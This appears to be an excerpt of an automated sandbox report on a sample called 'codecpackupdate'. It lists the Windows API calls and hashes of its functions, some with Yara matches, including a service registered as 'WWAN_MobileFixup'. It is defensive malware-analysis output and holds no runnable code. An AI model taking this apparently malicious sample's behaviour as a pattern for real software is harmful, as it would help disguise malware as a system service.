                                                                          • Source File: 00000003.00000002.2868320795.0000000000A2A000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_a2a000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteFile
                                                                          • String ID:
                                                                          • API String ID: 4033686569-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE489
                                                                            • Part of subcall function 009F26DB: RtlEnterCriticalSection.NTDLL(?), ref: 009F2706
                                                                            • Part of subcall function 009F26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 009F272B
                                                                            • Part of subcall function 009F26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A15A93), ref: 009F2738
                                                                            • Part of subcall function 009F26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 009F2778
                                                                            • Part of subcall function 009F26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 009F27D9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                          • String ID:
                                                                          • API String ID: 4293676635-0
                                                                          • Opcode ID: 46cc6dfaa660f9be7187593c9aa00dad85fd117ade79d73be4113fae0a79fe1a
                                                                          • Instruction ID: bdeed5c2114172ae230c25a04f0482cef3a9181c5560eb7640ee540f2a1a61eb
                                                                          • Opcode Fuzzy Hash: 46cc6dfaa660f9be7187593c9aa00dad85fd117ade79d73be4113fae0a79fe1a
                                                                          • Instruction Fuzzy Hash: 6401DCB0810B08DFC318CF1AC144A89FBF4FF88310B05C5AE94498B322E3B1AA80CF94
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009FE268
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                            • Part of subcall function 009FE484: __EH_prolog.LIBCMT ref: 009FE489
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: H_prolog$_malloc
                                                                          • String ID:
                                                                          • API String ID: 4254904621-0
                                                                          • Opcode ID: 3b4dfe31c25a114de0719f0588eaa7e3248c1db0cc08f5789913045fb6c19e25
                                                                          • Instruction ID: abba09f749816eb28cd1e542125c5e06008b16c1ba6d3ce9cab85600765ab1d9
                                                                          • Opcode Fuzzy Hash: 3b4dfe31c25a114de0719f0588eaa7e3248c1db0cc08f5789913045fb6c19e25
                                                                          • Instruction Fuzzy Hash: 6CE0C271A0010DAFCF4CDFA8E9127BDB7A9EB44340F00426EB808D6690EF708E108744
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00A05B9A: __getptd_noexit.LIBCMT ref: 00A05B9B
                                                                            • Part of subcall function 00A05B9A: __amsg_exit.LIBCMT ref: 00A05BA8
                                                                            • Part of subcall function 00A033D6: __getptd_noexit.LIBCMT ref: 00A033DA
                                                                            • Part of subcall function 00A033D6: __freeptd.LIBCMT ref: 00A033F4
                                                                            • Part of subcall function 00A033D6: RtlExitUserThread.NTDLL(?,00000000,?,00A033B6,00000000), ref: 00A033FD
                                                                          • __XcptFilter.LIBCMT ref: 00A033C2
                                                                            • Part of subcall function 00A08CD4: __getptd_noexit.LIBCMT ref: 00A08CD8
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                                          • String ID:
                                                                          • API String ID: 1405322794-0
                                                                          • Opcode ID: a697c161d1907d6f93caa1ae62d4d9161d741e116a09679514cdef925c12965b
                                                                          • Instruction ID: 447aaf8d91f917388d91f819e56d14c00b25ff59680aa14e98b531eea3950c95
                                                                          • Opcode Fuzzy Hash: a697c161d1907d6f93caa1ae62d4d9161d741e116a09679514cdef925c12965b
                                                                          • Instruction Fuzzy Hash: 71E0E6B19056089FDB08BBA4EA46E6E7775AF04301F110555F1015B1E1DE7899409B25
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000), ref: 0040B8D6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 6136a3877e6e2f0dd4123d90e237bad55ebe4cd6e2fa0a15503b3406c486cffe
                                                                          • Instruction ID: 868a890bdf16fbdb6b0f6a21b24728291ff6892bb476c2b181fa5c28a3fa7e1e
                                                                          • Opcode Fuzzy Hash: 6136a3877e6e2f0dd4123d90e237bad55ebe4cd6e2fa0a15503b3406c486cffe
                                                                          • Instruction Fuzzy Hash: ADD05E3460820ADBDB109F20CD8866936A0EB253407004676EC07AE294EBB4D9028A89
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE ref: 0040B00D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 500ff6ea7e252baa5171073ac6586a82d290a4070e409aae7b418b8824e4eb1f
                                                                          • Instruction ID: c2c62dfceaa2ca30394ff8bbcbca8809a465483e77cd5c694646456b11ff8d88
                                                                          • Opcode Fuzzy Hash: 500ff6ea7e252baa5171073ac6586a82d290a4070e409aae7b418b8824e4eb1f
                                                                          • Instruction Fuzzy Hash: 1FD0A77490810297D71056216E9DE65316CA704304F500236BE09B21D2E7B88956555E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.0000000000A2A000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A2A000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_a2a000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: abc47b0896c64a13a78bd09c05f9cc6de3580a10cf4c696721996d3e8e654410
                                                                          • Instruction ID: 4c55868cee638e3b3058026ff17e548d659481f2e97a8cc0b81c02cf84b193dd
                                                                          • Opcode Fuzzy Hash: abc47b0896c64a13a78bd09c05f9cc6de3580a10cf4c696721996d3e8e654410
                                                                          • Instruction Fuzzy Hash: EFD06CB241CB09CFC3917F69A884279BBF8AB48700F52492CD6C692641EA3418849B9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040BB0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSingleWait
                                                                          • String ID:
                                                                          • API String ID: 24740636-0
                                                                          • Opcode ID: 06cd4e1e2b5318ed55d10e10e6ab17b413496d7c215a766dc1cd46bbc1e42b35
                                                                          • Instruction ID: ef0758628b503f26ab19731c94afa928a07457d65258333e7402194836c43395
                                                                          • Opcode Fuzzy Hash: 06cd4e1e2b5318ed55d10e10e6ab17b413496d7c215a766dc1cd46bbc1e42b35
                                                                          • Instruction Fuzzy Hash: EFD0122110C091FFC65687A48C649A13BB8DD063553294AB3A463725E1C63C2016E36F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040BBA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 74f322b8ff5043d62f76b6d4d9924e6e430d0f9e420fe5ff5ec3609d02c6becc
                                                                          • Instruction ID: bc9fcb05ae8656bc41f953a4491f85b4eae85a5287a10dbca2abb42cf387f289
                                                                          • Opcode Fuzzy Hash: 74f322b8ff5043d62f76b6d4d9924e6e430d0f9e420fe5ff5ec3609d02c6becc
                                                                          • Instruction Fuzzy Hash: 07C012308080029BD71547649D08624BF70FB013007114061D183349A3C3366453A78E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                          • Instruction ID: 7a8fb3575aad36e99e01433973275fcd838bbbcd725035783ab06971788b140c
                                                                          • Opcode Fuzzy Hash: 4208be6c401ace8eaf57d9faaff6df1abccb720293123bf60b5afa5c9f998a5b
                                                                          • Instruction Fuzzy Hash: 5D017B72849596DBC7228F619D8CAA53F20EB05300B2C47FAE581769A2C33AD917D7CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                          • Instruction ID: c46616b9988c65e90fc05240c7557c229c01b71e50158476c3ddc31f6f3b184e
                                                                          • Opcode Fuzzy Hash: 4923c56613507f6154e6695a1a0a79be905ca74f5fc4bb1a8d63dae53b35cfd4
                                                                          • Instruction Fuzzy Hash: 22017D761987109DC721CA384D46D923B68EE22700B69096BF142BF1E2D33B950BD6CF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                            • Part of subcall function 00A01550: OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
                                                                            • Part of subcall function 00A01550: CloseHandle.KERNEL32(00000000), ref: 00A01605
                                                                            • Part of subcall function 00A01550: ResetEvent.KERNEL32(00000000,35B6412D), ref: 00A0160F
                                                                            • Part of subcall function 00A01550: CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A01644
                                                                          • TlsSetValue.KERNEL32(00000025,?), ref: 00A020EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$OpenResetValue
                                                                          • String ID:
                                                                          • API String ID: 1556185888-0
                                                                          • Opcode ID: 5b1a86e2d240fed508c78ac947ac665bed0d89603f8bb136d9e893b50606d726
                                                                          • Instruction ID: fdbddc25b5807c6f7e7a72db6fb203dc62715f98362243bcc87147a9a03bcfed
                                                                          • Opcode Fuzzy Hash: 5b1a86e2d240fed508c78ac947ac665bed0d89603f8bb136d9e893b50606d726
                                                                          • Instruction Fuzzy Hash: FD014F72A44208ABC710CF99ED45F9ABBB8FB09760F10862AF825D36D0D775690586A0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 1586166983-0
                                                                          • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                          • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • VirtualAlloc.KERNELBASE(?), ref: 0040B2FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                          • Instruction ID: 30eba2562c68e96c98e1aa31e98657024e3942590acf667e384b09b50b6edfb8
                                                                          • Opcode Fuzzy Hash: 18c128e7e1d3a70a9118cf2a5e811f5c9c954107df949b2efcfa9b5db2156fc9
                                                                          • Instruction Fuzzy Hash: 0BC08C31100901E7C7000B348E0C181B728FF007003260132EC03709A0C37E542DAAAD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                          • Instruction ID: 130aa393355d1d3f730376283a7cbe41ada4335551948cec256614a457e6477e
                                                                          • Opcode Fuzzy Hash: 7555949166ef3385efc278390852ec46746e317434f07fbea60302d659f1b0da
                                                                          • Instruction Fuzzy Hash: 43C08C30805940DBD2164B306E08B143B30E721700F200964E24320CE1833A6025D609
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                          • Instruction ID: daca3ffbd5ff764758662f534c55e9e56749cc2f8a70cc823d56b72693b939bd
                                                                          • Opcode Fuzzy Hash: 2f3bbf81509a6403ce4eb6566e4c2682b327bd7fda14c88d04de4b44162c8b52
                                                                          • Instruction Fuzzy Hash: 3BB092305C8B01FEE10107A09E59F386621E720B00F220623A703780E08BBA0663BA8F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • Sleep.KERNELBASE(000003E8), ref: 0040B673
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                          • Instruction ID: a3b9e5ac81abcb523932f8946054f8d2fd83f5673244a20f1dfd6dc4be3b2ef3
                                                                          • Opcode Fuzzy Hash: 00bf01a9b72d648d1cebd4848209a3c99be8b6c7cbdd3909c15e8f7d0f3832f1
                                                                          • Instruction Fuzzy Hash: 4EB092B1488A01AAE6010B905A2EB207622F720B00F120A22E303380E143BA0222ABCE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 00A008E2
                                                                          • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 00A008EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorFormatLastMessage
                                                                          • String ID:
                                                                          • API String ID: 3479602957-0
                                                                          • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                          • Instruction ID: 333be5aae6f226cacc47348891d90bc2c98ab52a1229338f12648adbffde0238
                                                                          • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                                          • Instruction Fuzzy Hash: A8F03A30208345DFEB24CE25C851F2EBBE4AB9D794F60092CF596A21D2D770E5858B6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00A04DD6,?,?,?,00000001), ref: 00A0946D
                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00A09476
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          • Opcode ID: 1193d7dbbbb34bd6c77dfc6ab789bc50217473f588e97d2bd980f34255f982d3
                                                                          • Instruction ID: 3beb0640bd387da71726515768a6bef449b952e2754b3bd16696c40136d41696
                                                                          • Opcode Fuzzy Hash: 1193d7dbbbb34bd6c77dfc6ab789bc50217473f588e97d2bd980f34255f982d3
                                                                          • Instruction Fuzzy Hash: 98B09235148308EBCB01ABD1EC09BDD3F38EB086A2F009410F60E44060CB6294129AA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F24E6
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 009F24FC
                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 009F250E
                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 009F256D
                                                                          • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 009F257F
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 009F2599
                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 009F25A2
                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 009F25F0
                                                                          • InterlockedDecrement.KERNEL32(00000002), ref: 009F262F
                                                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 009F268E
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F2699
                                                                          • InterlockedExchange.KERNEL32(00000000,00000001), ref: 009F26AD
                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 009F26BD
                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 009F26C7
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                          • String ID:
                                                                          • API String ID: 1213838671-0
                                                                          • Opcode ID: 8c2beb13ae59835c5b4197e3a1461a190a63df179fda089930f3cc10f335ccf7
                                                                          • Instruction ID: b94e1493056c0db707dd03c755196b1391d116f1202f78238fa869f01bf28098
                                                                          • Opcode Fuzzy Hash: 8c2beb13ae59835c5b4197e3a1461a190a63df179fda089930f3cc10f335ccf7
                                                                          • Instruction Fuzzy Hash: 5A613E71904309EFCB10DFA4D989AEEBBB9FF48310F10952AF616E7250D7349945CB61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • __EH_prolog.LIBCMT ref: 009F4608
                                                                            • Part of subcall function 00A03A8F: _malloc.LIBCMT ref: 00A03AA7
                                                                          • htons.WS2_32(?), ref: 009F4669
                                                                          • htonl.WS2_32(?), ref: 009F468C
                                                                          • htonl.WS2_32(00000000), ref: 009F4693
                                                                          • htons.WS2_32(00000000), ref: 009F4747
                                                                          • _sprintf.LIBCMT ref: 009F475D
                                                                            • Part of subcall function 009F88BF: _memmove.LIBCMT ref: 009F88DF
                                                                          • htons.WS2_32(?), ref: 009F46B0
                                                                            • Part of subcall function 009F966A: __EH_prolog.LIBCMT ref: 009F966F
                                                                            • Part of subcall function 009F966A: RtlEnterCriticalSection.NTDLL(00000020), ref: 009F96EA
                                                                            • Part of subcall function 009F966A: RtlLeaveCriticalSection.NTDLL(00000020), ref: 009F9708
                                                                            • Part of subcall function 009F1BA7: __EH_prolog.LIBCMT ref: 009F1BAC
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1BBC
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1BEA
                                                                            • Part of subcall function 009F1BA7: RtlEnterCriticalSection.NTDLL ref: 009F1C13
                                                                            • Part of subcall function 009F1BA7: RtlLeaveCriticalSection.NTDLL ref: 009F1C56
                                                                            • Part of subcall function 009FDE26: __EH_prolog.LIBCMT ref: 009FDE2B
                                                                          • htonl.WS2_32(?), ref: 009F497C
                                                                          • htonl.WS2_32(00000000), ref: 009F4983
                                                                          • htonl.WS2_32(00000000), ref: 009F49C8
                                                                          • htonl.WS2_32(00000000), ref: 009F49CF
                                                                          • htons.WS2_32(?), ref: 009F49EF
                                                                          • htons.WS2_32(?), ref: 009F49F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                          • String ID:
                                                                          • API String ID: 1645262487-0
                                                                          • Opcode ID: c5aa58de93275a593b571f635141f1bae74eabdc3349f6b07a9041dcef5b0ca9
                                                                          • Instruction ID: d2b1be23d0416486c65c3b29cb50ac1645a1029d0c760aaa297e7d54d49b8b4b
                                                                          • Opcode Fuzzy Hash: c5aa58de93275a593b571f635141f1bae74eabdc3349f6b07a9041dcef5b0ca9
                                                                          • Instruction Fuzzy Hash: 2C025671C0025DEEDF15DBE4C845BFEBBB8AF48304F10415AE605B7291EB746A89CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                          Strings
                                                                          • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                          • String ID: WWAN_MobileFixup 2.33.197.66
                                                                          • API String ID: 3346042915-2719033208
                                                                          • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                          • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
